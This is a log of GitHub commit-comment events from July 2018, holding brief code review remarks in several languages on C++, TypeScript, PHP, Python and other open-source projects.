{"id":"7935713558","type":"CommitCommentEvent","actor":{"login":"anshul98ks123"},"repo":{"name":"careercup/CtCI-6th-Edition-cpp"},"payload":{"comment":{"id":29637075,"position":null,"line":null,"path":null,"commit_id":"f0324753a3de79f143ae220f7442383b585a7ca0","created_at":"2018-07-09T06:49:30Z","updated_at":"2018-07-09T06:49:30Z","author_association":"NONE","body":"I think this will fail for case when root is 1 and its right child is 2. And we have to find successor of 2 which is null but your algorithm will give answer 1 which is wrong. "}},"created_at":"2018-07-09T06:49:30Z"}
{"id":"7935715013","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637077,"position":11,"line":33,"path":"src/plugins/Invocation.ts","commit_id":"c3e674a48e4ca224c0df8b8927bb74f4b7b7f42d","created_at":"2018-07-09T06:49:54Z","updated_at":"2018-07-09T06:49:54Z","author_association":"MEMBER","body":"Why this changed to async? As far as I see, hook points are already called async by `Promise` in `ThundraWrapper:: executeHook` "}},"created_at":"2018-07-09T06:49:54Z"}
{"id":"7935718043","type":"CommitCommentEvent","actor":{"login":"kitty7756"},"repo":{"name":"deliEat/DeliEat-develop"},"payload":{"comment":{"id":29637082,"position":null,"line":null,"path":null,"commit_id":"f85c4f8b12d04a298330fb7a364b9ae184fe9935","created_at":"2018-07-09T06:50:43Z","updated_at":"2018-07-09T06:50:43Z","author_association":"CONTRIBUTOR","body":"Whoops, probably reverted pubspec.lock"}},"created_at":"2018-07-09T06:50:43Z"}
{"id":"7935718920","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29637084,"position":56,"line":288,"path":"Source/Foundation/bsfCore/Particles/BsParticleSystem.cpp","commit_id":"c15a49e2d44977484382edb4dea9d2a7d394aa34","created_at":"2018-07-09T06:50:58Z","updated_at":"2018-07-09T06:50:58Z","author_association":"CONTRIBUTOR","body":"For blocks like this, you could do something like\r\n\r\n```\r\ntemplate<typename ARG1_t, typename ... ARGS_T>\r\nchar* rttiReadMultiElem(char* memory, ARG1_T & arg1, ARGS_T & ... args)\r\n{\r\n    memory = rttiReadElem(arg1, memory);\r\n    return rttiReadMultiElem(memory, args...); // I don't think you need std::forward, but sometimes the rvalue-reference collapsing rules are a bit befuddling, so i'm not 100% sure.\r\n}\r\n```\r\n\r\nWith comma operators it could potentially look like this:\r\n\r\n```\r\ntemplate<typename ... ARGS_T>\r\nchar* rttiReadMultiElem(char* memory, ARGS_T & ... args)\r\n{\r\n    using swallow = char*[];\r\n    swallow{nullptr, memory = rttiReadElem(args, memory)... }; // The comma operator always executes left to right, so memory gets updated in the proper order.\r\n    return memory;\r\n}\r\n```\r\n\r\nC++17 fold expressions could probably be a bit more terse, but i'm not really well versed in using them yet *shrug*."}},"created_at":"2018-07-09T06:50:58Z"}
{"id":"7935726066","type":"CommitCommentEvent","actor":{"login":"Yajo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29637091,"position":31,"line":518,"path":"doc/setup/deploy.rst","commit_id":"896e3f4c1eace0c1ad3e3b472fa373e62d7cddb5","created_at":"2018-07-09T06:52:52Z","updated_at":"2018-07-09T06:52:52Z","author_association":"CONTRIBUTOR","body":"AFAIK this won't be logged if the attacker tries with a user name that doesn't exist in the database."}},"created_at":"2018-07-09T06:52:52Z"}
{"id":"7935726452","type":"CommitCommentEvent","actor":{"login":"zixia"},"repo":{"name":"Chatie/wechaty-getting-started"},"payload":{"comment":{"id":29637092,"position":null,"line":null,"path":null,"commit_id":"61e3e6f98a1600da0ac173f94b1d945bc728c8b4","created_at":"2018-07-09T06:52:58Z","updated_at":"2018-07-09T06:52:58Z","author_association":"MEMBER","body":"Ok, I'll consider to remove it if there has someone complain about it in the future."}},"created_at":"2018-07-09T06:52:58Z"}
{"id":"7935728793","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29637093,"position":null,"line":null,"path":null,"commit_id":"d9a9682f7219f1cf3b8cc5555f8a3157803ab7b0","created_at":"2018-07-09T06:53:35Z","updated_at":"2018-07-09T06:53:35Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/wrong-number-of-topics-in-categories-in-the-hamburger-menu/91775/6\n"}},"created_at":"2018-07-09T06:53:35Z"}
{"id":"7935733225","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29637101,"position":12,"line":50,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.cpp","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T06:54:47Z","updated_at":"2018-07-09T06:54:47Z","author_association":"CONTRIBUTOR","body":"Do you know if the various IDEs out there are able to handle variadic templates w/ intellisense (or whatever the particular IDE calls it) ?\r\n\r\nSeems a waste to always have to type out the full parameter list twice."}},"created_at":"2018-07-09T06:54:47Z"}
{"id":"7935733727","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637102,"position":50,"line":127,"path":"src/ThundraWrapper.ts","commit_id":"c3e674a48e4ca224c0df8b8927bb74f4b7b7f42d","created_at":"2018-07-09T06:54:55Z","updated_at":"2018-07-09T06:54:55Z","author_association":"MEMBER","body":"Why `async` is removed from here? `sendReports` method is marked with `async`"}},"created_at":"2018-07-09T06:54:55Z"}
{"id":"7935735261","type":"CommitCommentEvent","actor":{"login":"SheepTester"},"repo":{"name":"SheepTester/scratch-gui"},"payload":{"comment":{"id":29637104,"position":null,"line":null,"path":null,"commit_id":"f1c35603e2741dbc2233af153b1708edf7294675","created_at":"2018-07-09T06:55:21Z","updated_at":"2018-07-09T06:55:21Z","author_association":"OWNER","body":"oopsies!\r\n\r\nwhy does it keep putting it in this folder though\r\n\r\nmaybe I did it wrong?\r\n\r\nattempt number 3!"}},"created_at":"2018-07-09T06:55:21Z"}
{"id":"7935735952","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29637106,"position":null,"line":null,"path":null,"commit_id":"7058ddbb66084bee9cd507ed69f031ec1262163e","created_at":"2018-07-09T06:55:32Z","updated_at":"2018-07-09T06:55:32Z","author_association":"MEMBER","body":"Huh? Ever seen a floating point M code or T code?"}},"created_at":"2018-07-09T06:55:32Z"}
{"id":"7935738832","type":"CommitCommentEvent","actor":{"login":"805bluebell"},"repo":{"name":"rse/es6-features"},"payload":{"comment":{"id":29637111,"position":null,"line":null,"path":null,"commit_id":"928269d1148d454b230dc13af2fdb78b8b8e8c5f","created_at":"2018-07-09T06:56:17Z","updated_at":"2018-07-09T06:56:17Z","author_association":"NONE","body":"sharp eyes"}},"created_at":"2018-07-09T06:56:17Z"}
{"id":"7935738878","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637112,"position":5,"line":6,"path":"src/index.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-09T06:56:18Z","updated_at":"2018-07-09T06:56:18Z","author_association":"MEMBER","body":"What is this for?"}},"created_at":"2018-07-09T06:56:18Z"}
{"id":"7935741810","type":"CommitCommentEvent","actor":{"login":"demiculus"},"repo":{"name":"zack-bitcoin/amoveo"},"payload":{"comment":{"id":29637117,"position":null,"line":null,"path":null,"commit_id":"7cd2225f008b186160de8c58a735287d99d5e82f","created_at":"2018-07-09T06:57:03Z","updated_at":"2018-07-09T06:57:03Z","author_association":"NONE","body":"Nice catch 👍 "}},"created_at":"2018-07-09T06:57:03Z"}
{"id":"7935741836","type":"CommitCommentEvent","actor":{"login":"China-Bill-Git"},"repo":{"name":"China-Bill-Git/cici"},"payload":{"comment":{"id":29637118,"position":null,"line":null,"path":null,"commit_id":"bc278fd51aee3a7cd4db37ff500a1ef0e3c7b772","created_at":"2018-07-09T06:57:04Z","updated_at":"2018-07-09T06:57:04Z","author_association":"OWNER","body":"sure"}},"created_at":"2018-07-09T06:57:04Z"}
{"id":"7935742380","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29637119,"position":null,"line":null,"path":null,"commit_id":"73912ebc1223bf13d23ff0cfeb515e57ef2a6b18","created_at":"2018-07-09T06:57:11Z","updated_at":"2018-07-09T06:57:11Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/suggestion-regarding-the-box-shadow-of-the-dark-theme-composer/77102/5\n"}},"created_at":"2018-07-09T06:57:11Z"}
{"id":"7935742407","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29637120,"position":null,"line":null,"path":null,"commit_id":"677e126fbf5d681ef1666b119333b0a89480ba31","created_at":"2018-07-09T06:57:11Z","updated_at":"2018-07-09T06:57:11Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/suggestion-regarding-the-box-shadow-of-the-dark-theme-composer/77102/5\n"}},"created_at":"2018-07-09T06:57:11Z"}
{"id":"7935747804","type":"CommitCommentEvent","actor":{"login":"sarthak-srivastava"},"repo":{"name":"cytoscape/appstore"},"payload":{"comment":{"id":29637122,"position":null,"line":null,"path":null,"commit_id":"6861a19b27797a471d71501e9a94466160dca083","created_at":"2018-07-09T06:58:42Z","updated_at":"2018-07-09T06:58:42Z","author_association":"COLLABORATOR","body":"Basic app Search has started functioning."}},"created_at":"2018-07-09T06:58:42Z"}
{"id":"7935747870","type":"CommitCommentEvent","actor":{"login":"mafeng117"},"repo":{"name":"mafeng117/cowpro"},"payload":{"comment":{"id":29637123,"position":null,"line":null,"path":null,"commit_id":"c5e0bc87d027613d3dbc72061eef5bd33e2e123e","created_at":"2018-07-09T06:58:43Z","updated_at":"2018-07-09T06:58:43Z","author_association":"OWNER","body":"调用代金券使用规则判断，并显示"}},"created_at":"2018-07-09T06:58:43Z"}
{"id":"7935748721","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637125,"position":19,"line":23,"path":"src/index.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-09T06:58:56Z","updated_at":"2018-07-09T06:58:56Z","author_association":"MEMBER","body":"I think, tracer should be managed by `TracePlugin`. Because tracer is part of `TracePlugin`."}},"created_at":"2018-07-09T06:58:56Z"}
{"id":"7935750267","type":"CommitCommentEvent","actor":{"login":"Hiroki01"},"repo":{"name":"Hiroki01/Summer-vacation-assignment"},"payload":{"comment":{"id":29637131,"position":null,"line":null,"path":null,"commit_id":"75a5a5655928b366c4b6c29835cd7d45414b4ea9","created_at":"2018-07-09T06:59:19Z","updated_at":"2018-07-09T06:59:19Z","author_association":"OWNER","body":"コピーライトの年数を変更\r\n年数が経つ度に自動増加"}},"created_at":"2018-07-09T06:59:19Z"}
{"id":"7935750918","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29637132,"position":49,"line":125,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.h","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T06:59:29Z","updated_at":"2018-07-09T06:59:29Z","author_association":"CONTRIBUTOR","body":"Interesting.\r\n\r\nDoes this properly initialize the atomic to the value of mCount given in the constructor?\r\n\r\nI've never tried to use default initialization with non-constant data."}},"created_at":"2018-07-09T06:59:29Z"}
{"id":"7935752011","type":"CommitCommentEvent","actor":{"login":"AntoineLemichel"},"repo":{"name":"AntoineLemichel/portfolio"},"payload":{"comment":{"id":29637133,"position":null,"line":null,"path":null,"commit_id":"ae5bad478fb1c4f0b443cad620e401b43f0e6184","created_at":"2018-07-09T06:59:47Z","updated_at":"2018-07-09T06:59:47Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Adding picture to full-screen background](https://trello.com/c/6kYPiGgq/28-adding-picture-to-full-screen-background)"}},"created_at":"2018-07-09T06:59:47Z"}
{"id":"7935752450","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29637134,"position":18,"line":44,"path":"contracts/Splitter.sol","commit_id":"34dd3f7dd81dfa91cd438b080bd2890c6aca9185","created_at":"2018-07-09T06:59:54Z","updated_at":"2018-07-09T06:59:54Z","author_association":"OWNER","body":"@rob-Hitchens  The reason I wanted to include the remainingShare in the log was that it will be useful to recreate the contract's current state from the logs. So now if we are removing it, can I include the msg.value in the logs. So that we can easily derive the msg.sender's balance from the logs by doing -> msg.value - (2*singleShare). Correct me If I am wrong."}},"created_at":"2018-07-09T06:59:54Z"}
{"id":"7935753733","type":"CommitCommentEvent","actor":{"login":"AntoineLemichel"},"repo":{"name":"AntoineLemichel/portfolio"},"payload":{"comment":{"id":29637140,"position":null,"line":null,"path":null,"commit_id":"8972eee7300340e5bd10e4041a23bb2448923a1a","created_at":"2018-07-09T07:00:13Z","updated_at":"2018-07-09T07:00:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Adding function JavaScript for scroll smooth](https://trello.com/c/I8TQAWC1/29-adding-function-javascript-for-scroll-smooth)"}},"created_at":"2018-07-09T07:00:13Z"}
{"id":"7935757264","type":"CommitCommentEvent","actor":{"login":"AntoineLemichel"},"repo":{"name":"AntoineLemichel/portfolio"},"payload":{"comment":{"id":29637150,"position":null,"line":null,"path":null,"commit_id":"e0c41dfe5b0016ced6e1724f45ed9d6295082be0","created_at":"2018-07-09T07:01:02Z","updated_at":"2018-07-09T07:01:02Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Adding media for picture background for all devices](https://trello.com/c/A6I82Cwf/30-adding-media-for-picture-background-for-all-devices)"}},"created_at":"2018-07-09T07:01:02Z"}
{"id":"7935762369","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"Silverlight1989/YII2"},"payload":{"comment":{"id":29637159,"position":34,"line":34,"path":"lesson4/controllers/SiteController.php","commit_id":"89671128da25762b0dd99a1a438acefcb5b4dc3d","created_at":"2018-07-09T07:02:17Z","updated_at":"2018-07-09T07:02:17Z","author_association":"CONTRIBUTOR","body":"после return в методе уже ничего не выполняется"}},"created_at":"2018-07-09T07:02:17Z"}
{"id":"7935762411","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637160,"position":6,"line":6,"path":"src/opentracing/SpanTree.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-09T07:02:17Z","updated_at":"2018-07-09T07:02:17Z","author_association":"MEMBER","body":"Why type of parent is not `SpanTreeNode`? If every `SpanTreeNode` has a reference to its parent `SpanTreeNode`, we may get rid complexity of `findSpan` used by `Recorder::record` to find parent node."}},"created_at":"2018-07-09T07:02:17Z"}
{"id":"7935762735","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29637161,"position":37,"line":121,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.cpp","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T07:02:22Z","updated_at":"2018-07-09T07:02:22Z","author_association":"CONTRIBUTOR","body":"Since you're always passing by value into the lambda, you could consider taking this parameter by value, and letting the caller decide whether to move or copy into the function.\r\n\r\nYou'll have to modify your code a bit to support that.\r\n\r\nE.g, grab a reference to taskGroup->mName, mPriority, and mTaskDependency, and then construct your lambda like\r\n\r\nconst auto worker = [i, tGroup = std::move(taskGroup)] ...\r\n\r\nBut saving that potential atomic pointer operation might be worth it for those minor changes."}},"created_at":"2018-07-09T07:02:22Z"}
{"id":"7935766500","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29637167,"position":26,"line":263,"path":"plugins/PostProcessingPlugin/scripts/PauseAtHeight.py","commit_id":"e61ad750b7111d1c38e84e01b531aa87529f78c7","created_at":"2018-07-09T07:03:22Z","updated_at":"2018-07-09T07:03:22Z","author_association":"MEMBER","body":"Code style: Space around binary operator `=`."}},"created_at":"2018-07-09T07:03:22Z"}
{"id":"7935768698","type":"CommitCommentEvent","actor":{"login":"Akari1987"},"repo":{"name":"Akari1987/test_laravel5_4_php7"},"payload":{"comment":{"id":29637172,"position":32,"line":93,"path":"resources/assets/js/components/messagebox/stream/MessageComposer.vue","commit_id":"a7dbf4795898721227bb7235fa145a256f2c3283","created_at":"2018-07-09T07:03:55Z","updated_at":"2018-07-09T07:03:55Z","author_association":"OWNER","body":"message を post した後、サーバー側 response を受け取って streamMessages を reload していたが、socket の response を使用し streamMessages を reload する方法に変更"}},"created_at":"2018-07-09T07:03:55Z"}
{"id":"7935770273","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29637176,"position":37,"line":121,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.cpp","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T07:04:19Z","updated_at":"2018-07-09T07:04:19Z","author_association":"CONTRIBUTOR","body":"Oh. Dangit. You're copying the taskGroup smart pointer every time through the loop.\r\n\r\nYou could still do it if you wanted to make the loop one-short, and add the code as described above after the loop.\r\n\r\nBut I doubt that's worth doing. Neat code is generally better than one atomic operation."}},"created_at":"2018-07-09T07:04:19Z"}
{"id":"7935777461","type":"CommitCommentEvent","actor":{"login":"reyem"},"repo":{"name":"openhab/openhab2-addons"},"payload":{"comment":{"id":29637192,"position":null,"line":null,"path":null,"commit_id":"7596dffa0bfa2d1f38d3331217e9dfdb7fa2b73e","created_at":"2018-07-09T07:06:09Z","updated_at":"2018-07-09T07:06:09Z","author_association":"CONTRIBUTOR","body":"What is/was wrong?"}},"created_at":"2018-07-09T07:06:09Z"}
{"id":"7935777987","type":"CommitCommentEvent","actor":{"login":"dkssud6903"},"repo":{"name":"dkssud6903/Myproject"},"payload":{"comment":{"id":29637194,"position":null,"line":null,"path":null,"commit_id":"ea97f01d02ff06f56cdba730dd58c10a8c759e38","created_at":"2018-07-09T07:06:16Z","updated_at":"2018-07-09T07:06:16Z","author_association":"OWNER","body":"s"}},"created_at":"2018-07-09T07:06:16Z"}
{"id":"7935780157","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"Kapeli/Dash-iOS"},"payload":{"comment":{"id":29637203,"position":5,"line":5,"path":"CHANGELOG.md","commit_id":"5bb4d294a20af7ab23dca5144e7b1c5604f3f1a1","created_at":"2018-07-09T07:06:49Z","updated_at":"2018-07-09T07:06:49Z","author_association":"NONE","body":"dash-tarix:///var/mobile/Containers/Data/Application/84FE32F1-EE64-406D-8B5E-54D0E145A65E/Library/Docsets/User%20Contributed/WebTest/WebTest.docset/Contents/Resources/Documents/api.html#webtest.debugapp.make_debug_app### \r\n\r\n> [`_****_`](dash-tarix:///var/mobile/Containers/Data/Application/84FE32F1-EE64-406D-8B5E-54D0E145A65E/Library/Docsets/User%20Contributed/WebTest/WebTest.docset/Contents/Resources/Documents/api.html#webtest.debugapp.make_debug_app) #75 "}},"created_at":"2018-07-09T07:06:49Z"}
{"id":"7935781653","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29637204,"position":49,"line":125,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.h","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T07:07:12Z","updated_at":"2018-07-09T07:07:12Z","author_association":"CONTRIBUTOR","body":"Is mCount actually used in the code aside from initializing mNumRemainingTasks ? Maybe github's intereface is making it hard to find. but I'm not finding anywhere it's used?"}},"created_at":"2018-07-09T07:07:12Z"}
{"id":"7935784024","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637206,"position":4,"line":4,"path":"src/opentracing/Recorder.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-09T07:07:48Z","updated_at":"2018-07-09T07:07:48Z","author_association":"MEMBER","body":"`getActiveSpan` method might be useful. Because user might want to retrieve active span (not `SpanTreeNode` but the span itself) over tracer, so tracer gets active span from recorder."}},"created_at":"2018-07-09T07:07:48Z"}
{"id":"7935785261","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29637212,"position":49,"line":125,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.h","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T07:08:08Z","updated_at":"2018-07-09T07:08:08Z","author_association":"CONTRIBUTOR","body":"Duh. Nevermind. Sorry."}},"created_at":"2018-07-09T07:08:08Z"}
{"id":"7935785607","type":"CommitCommentEvent","actor":{"login":"Forrest-Stone"},"repo":{"name":"Forrest-Stone/LogisticsManagementSystem"},"payload":{"comment":{"id":29637215,"position":null,"line":null,"path":null,"commit_id":"428bfbc76be9683c0d2a584cabc3ec49f67f2fa3","created_at":"2018-07-09T07:08:14Z","updated_at":"2018-07-09T07:08:14Z","author_association":"OWNER","body":"![na](https://user-images.githubusercontent.com/32565193/42435685-e488f92e-8389-11e8-8538-725a8364156e.jpg)\r\n"}},"created_at":"2018-07-09T07:08:14Z"}
{"id":"7935791044","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637228,"position":23,"line":23,"path":"src/opentracing/Recorder.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-09T07:09:33Z","updated_at":"2018-07-09T07:09:33Z","author_association":"MEMBER","body":"If `SpanTreeNode` references its parent as `SpanTreeNode` (not as `ThundraSpan`), new active span can be found directly without traversing span tree."}},"created_at":"2018-07-09T07:09:33Z"}
{"id":"7935791788","type":"CommitCommentEvent","actor":{"login":"Ragasrm"},"repo":{"name":"Janaanalysis/ROYEMR"},"payload":{"comment":{"id":29637230,"position":null,"line":null,"path":null,"commit_id":"94990b4586b93b038bb57c98e8401eaba36ada75","created_at":"2018-07-09T07:09:46Z","updated_at":"2018-07-09T07:09:46Z","author_association":"NONE","body":"dsadsa"}},"created_at":"2018-07-09T07:09:46Z"}
{"id":"7935791889","type":"CommitCommentEvent","actor":{"login":"rc1021"},"repo":{"name":"rc1021/mysite-suyu"},"payload":{"comment":{"id":29637231,"position":3,"line":10,"path":"blog/templates/home.html","commit_id":"f8246776a886a6cd9b72e50ca542fb8d244925ef","created_at":"2018-07-09T07:09:48Z","updated_at":"2018-07-09T07:09:48Z","author_association":"OWNER","body":"加入 Bootstrap 4 的 css "}},"created_at":"2018-07-09T07:09:48Z"}
{"id":"7935792044","type":"CommitCommentEvent","actor":{"login":"rextaylor"},"repo":{"name":"cmgmyr/laravel-messenger"},"payload":{"comment":{"id":29637232,"position":5,"line":325,"path":"src/Cmgmyr/Messenger/Models/Thread.php","commit_id":"732103b83c96a930571b489fd88ee538e20909ea","created_at":"2018-07-09T07:09:50Z","updated_at":"2018-07-09T07:09:50Z","author_association":"NONE","body":"This will cause error to laravel 4 application. @cmgmyr "}},"created_at":"2018-07-09T07:09:50Z"}
{"id":"7935793566","type":"CommitCommentEvent","actor":{"login":"rc1021"},"repo":{"name":"rc1021/mysite-suyu"},"payload":{"comment":{"id":29637238,"position":4,"line":11,"path":"blog/templates/home.html","commit_id":"f8246776a886a6cd9b72e50ca542fb8d244925ef","created_at":"2018-07-09T07:10:15Z","updated_at":"2018-07-09T07:10:15Z","author_association":"OWNER","body":"加入 Bootstrap 4 的 css"}},"created_at":"2018-07-09T07:10:15Z"}
{"id":"7935794297","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"Evgeny1973/gb-yii.local"},"payload":{"comment":{"id":29637242,"position":32,"line":32,"path":"models/query/AccessQuery.php","commit_id":"7c13f20830e96d9a0bb75dea6d54482dfd145902","created_at":"2018-07-09T07:10:27Z","updated_at":"2018-07-09T07:10:27Z","author_association":"NONE","body":"если указывать как массив ['user_id' => $user_id] то плейсхолдеры не потребуются"}},"created_at":"2018-07-09T07:10:27Z"}
{"id":"7935795358","type":"CommitCommentEvent","actor":{"login":"rc1021"},"repo":{"name":"rc1021/mysite-suyu"},"payload":{"comment":{"id":29637247,"position":9,"line":16,"path":"blog/templates/home.html","commit_id":"f8246776a886a6cd9b72e50ca542fb8d244925ef","created_at":"2018-07-09T07:10:44Z","updated_at":"2018-07-09T07:10:44Z","author_association":"OWNER","body":"加入 Bootstrap 4 的 javascript"}},"created_at":"2018-07-09T07:10:44Z"}
{"id":"7935795604","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29637248,"position":null,"line":null,"path":null,"commit_id":"7058ddbb66084bee9cd507ed69f031ec1262163e","created_at":"2018-07-09T07:10:48Z","updated_at":"2018-07-09T07:10:48Z","author_association":"CONTRIBUTOR","body":"At this point in the code they were all floats, because of the getValue method."}},"created_at":"2018-07-09T07:10:48Z"}
{"id":"7935796179","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"Evgeny1973/gb-yii.local"},"payload":{"comment":{"id":29637251,"position":30,"line":30,"path":"models/query/AccessQuery.php","commit_id":"7c13f20830e96d9a0bb75dea6d54482dfd145902","created_at":"2018-07-09T07:10:57Z","updated_at":"2018-07-09T07:10:57Z","author_association":"NONE","body":"по PSR принято называть переменные в camelCase"}},"created_at":"2018-07-09T07:10:57Z"}
{"id":"7935797667","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637255,"position":63,"line":63,"path":"src/opentracing/Span.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-09T07:11:19Z","updated_at":"2018-07-09T07:11:19Z","author_association":"MEMBER","body":"`_getOperationName` method might be useful"}},"created_at":"2018-07-09T07:11:19Z"}
{"id":"7935799335","type":"CommitCommentEvent","actor":{"login":"floretan"},"repo":{"name":"wunderio/drupal-project"},"payload":{"comment":{"id":29637259,"position":5,"line":5,"path":".lando.yml","commit_id":"31b494fcb078f7aa044c6279347c2caa259dc13c","created_at":"2018-07-09T07:11:48Z","updated_at":"2018-07-09T07:11:48Z","author_association":"MEMBER","body":"Yes, you are right!\r\n\r\nSince we only use this file for selenium, we should move it to a \"compose\" service: https://docs.devwithlando.io/services/compose.html"}},"created_at":"2018-07-09T07:11:48Z"}
{"id":"7935799629","type":"CommitCommentEvent","actor":{"login":"serkan-ozal"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29637261,"position":75,"line":75,"path":"src/opentracing/Span.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-09T07:11:53Z","updated_at":"2018-07-09T07:11:53Z","author_association":"MEMBER","body":"`_getTag`/`_setTag` methods might be useful"}},"created_at":"2018-07-09T07:11:53Z"}
{"id":"7935801673","type":"CommitCommentEvent","actor":{"login":"rc1021"},"repo":{"name":"rc1021/mysite-suyu"},"payload":{"comment":{"id":29637267,"position":21,"line":18,"path":"blog/templates/home.html","commit_id":"f8246776a886a6cd9b72e50ca542fb8d244925ef","created_at":"2018-07-09T07:12:24Z","updated_at":"2018-07-09T07:12:24Z","author_association":"OWNER","body":"加入自訂的 \".navbar-fixed\" 讓頁面上方空出一點點距離, 避免 navbar 下的內容被遮住"}},"created_at":"2018-07-09T07:12:24Z"}
{"id":"7935801782","type":"CommitCommentEvent","actor":{"login":"sheenalin"},"repo":{"name":"lovrot/misc-examples-pam50"},"payload":{"comment":{"id":29637268,"position":34,"line":20,"path":"munge/02-A-munge-mainz.R","commit_id":"8c9d456eeb41c0d19047ba1ae5fd4011f6063ba2","created_at":"2018-07-09T07:12:26Z","updated_at":"2018-07-09T07:12:26Z","author_association":"NONE","body":"Hi John,\r\n\r\nI tried to use this code, however, it's giving an error message regarding varnamconv. I think somehow it does not have varnamconv read in. Would you please let me know how to resolve this problem?\r\nThank you very much.\r\nSincerely,\r\nSheena  "}},"created_at":"2018-07-09T07:12:26Z"}
{"id":"7935802339","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29637271,"position":49,"line":57,"path":"Source/Foundation/bsfCore/Particles/BsParticleManager.cpp","commit_id":"0c9e1d2d6aeed14a951eea9df443dd3667a9721c","created_at":"2018-07-09T07:12:34Z","updated_at":"2018-07-09T07:12:34Z","author_association":"CONTRIBUTOR","body":"Alternatively a this-> would have cleared it up too."}},"created_at":"2018-07-09T07:12:34Z"}
